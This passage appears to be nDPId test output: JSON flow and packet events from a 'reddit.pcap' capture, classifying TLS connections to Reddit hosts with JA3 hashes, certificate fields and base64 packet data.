{"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":571,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":680,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":686,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":696,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":700,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686064,"flow_last_seen":1605291686142,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":713,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686144,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":717,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686144,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":722,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686145,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686145,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":736,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":738,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":751,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":754,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":807,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":818,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686084,"flow_last_seen":1605291686183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686183,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686301,"flow_last_seen":1605291686301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605291686301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686301,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML0AAAAAoAL9IDDZAAACBAWgBAIICql05vEAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605291686327,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686327,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdEkHBFWUkNzC+oBJXgILuAAACBAV4AQMDAwQCCArC1zmoqXTm8Q=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605291686327,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686327,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML5BwRVmgBAB+wbmAAABAQgKqXTnC8LXOag="} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1211,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686301,"flow_last_seen":1605291686327,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686327,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 